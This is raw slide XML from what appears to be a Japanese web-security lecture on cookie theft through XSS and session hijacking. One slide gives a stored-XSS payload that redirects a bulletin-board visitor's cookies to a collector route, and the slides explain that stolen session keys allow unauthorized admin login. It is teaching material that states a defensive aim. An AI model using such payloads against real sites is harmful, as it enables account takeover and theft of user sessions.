        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3677396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8221A-EBE0-1158-6972-A49C18FB859E}"/>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1FBF9C4C-D3B0-598C-3AE8-0D7F3D73F8ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クッキーの漏洩</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ログイン画面</a:t>
            </a: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D769F4C9-DAE7-9492-3C36-C139E950EAF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3415535" y="2299555"/>
            <a:ext cx="5360930" cy="4407369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1750068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85BC2A-B6B9-AC13-2048-FE34BC4E9671}"/>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8FB96381-ECD4-CD75-1DB3-43B953AEE276}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クッキーの漏洩</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>掲示板画面</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0194F2AE-449A-E3A0-1E45-F1F50759F631}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2791568" y="2331093"/>
            <a:ext cx="6608864" cy="4328124"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2991515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C165A4-9386-4237-D376-1BB6B0F2DA2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>※</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>注意</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D74D2B97-C91B-8D6A-9EF3-9285FA04566E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>本講座は不正アクセスに対してプログラム的に防ぐ手法を習得する事が目的で不正アクセスの手法を学ぶ事があります。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>しかし本講座は不正アクセスを推奨するものではありません。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2220734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8F83EE-E189-322A-9A6A-265794B4BA27}"/>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118CF815-C367-B1D9-D5C1-4A111BD8E84D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クッキーの漏洩</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>データの送り先と実行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>このルーティングにクッキーの情報が来る</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="図 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F2C636F-70E0-0C81-873C-66CA294FBC36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3119022" y="3429000"/>
            <a:ext cx="5953956" cy="2238687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1520759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35C2A-8810-4A20-736A-33074DF1A051}"/>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333DE461-8200-0099-8F59-F82BEA1E8DF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クッキー</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の漏洩</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF41867B-F722-7F01-40E4-4C6ADF2E562C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2449002"/>
            <a:ext cx="4561021" cy="1490483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCDC2D4E-9999-3CD1-99FD-C1B7F737E742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6632914" y="2387392"/>
            <a:ext cx="4144132" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矢印: 右 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37AD35CA-B21E-5A45-B6DC-89B2913FDA92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5144494" y="3401971"/>
            <a:ext cx="1393147" cy="1160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ログイン</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="779358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05DBD3-FEEC-F10E-BF2A-BF6EED2142A0}"/>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C22B98D2-16CA-7AB3-201E-CD8C9DA8E72C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クッキーの漏洩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>掲示板に書き込む</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>に以下のように入力して送信する</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="図 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D57E9C3-10D6-0EDF-FC04-C34ED5DFB456}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4731027" y="4886165"/>
            <a:ext cx="7174116" cy="1425735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="コネクタ: カギ線 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A4E5C70-16BD-C686-DB81-D567D0DFF0D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3494448" y="4362454"/>
            <a:ext cx="813996" cy="165916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23BA953-E9B1-CB11-E19E-BABD7E6EE70A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2759102" y="5690434"/>
            <a:ext cx="646331" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>送信</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="テキスト ボックス 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8784FC15-2A2D-F312-E212-2465629D6E99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6956173" y="6460204"/>
            <a:ext cx="2723823" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ジャンプ先のページ内容</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="テキスト ボックス 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6258877-DBCA-315E-900E-604C2A1A4727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5810469" y="3246970"/>
            <a:ext cx="6094674" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>入力内容&lt;script&gt;window.location='http://localhost:5000/xss?id='+document.cookie;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="図 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B93C4D21-471F-B40E-48FC-6FFA76F55520}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="428008" y="3759063"/>
            <a:ext cx="5287714" cy="1025974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="テキスト ボックス 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23D35D42-8239-B11F-B883-7322CC8C1752}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7370339" y="4271428"/>
            <a:ext cx="2031325" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クッキーの文字列</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="直線コネクタ 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B10F99E-5488-5227-14B9-2472F03DBFA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6265628" y="4071068"/>
            <a:ext cx="18447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244EAA29-4E8C-23D1-B0E0-AC4B0D374E85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7207063" y="4123124"/>
            <a:ext cx="163277" cy="332970"/>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134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54E184-2A89-DFC2-28BF-63EFBCCFD083}"/>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D5500056-BC20-8937-E538-052C3C11BA92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クッキー</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の漏洩</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ここではこの</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>つの情報だったが、使用する環境やサーバ側の言語によっては</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>セッションキーも流出</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>する。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>→セッションキー流出によって</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不正ログイン</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ができる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>また、今回は分かりやすくページ遷移で情報を抜き取ったが</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>などで見えないように送信されると気づかぬうちに情報漏洩することがある。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1690346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A72A1-5C46-2F8B-2043-2F53B33A42E6}"/>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254A6218-0E59-C0F1-DA5B-A635F3665DF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>補足</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>セッションキーハイジャック</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でセッションを発行してセッションの「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」が「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>aaa@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」の場合に管理者として、それ以外一般ユーザとすることを表示するサービス</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>これに対して管理者のセッションキーを入手して一般ユーザが管理者として入り込む</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
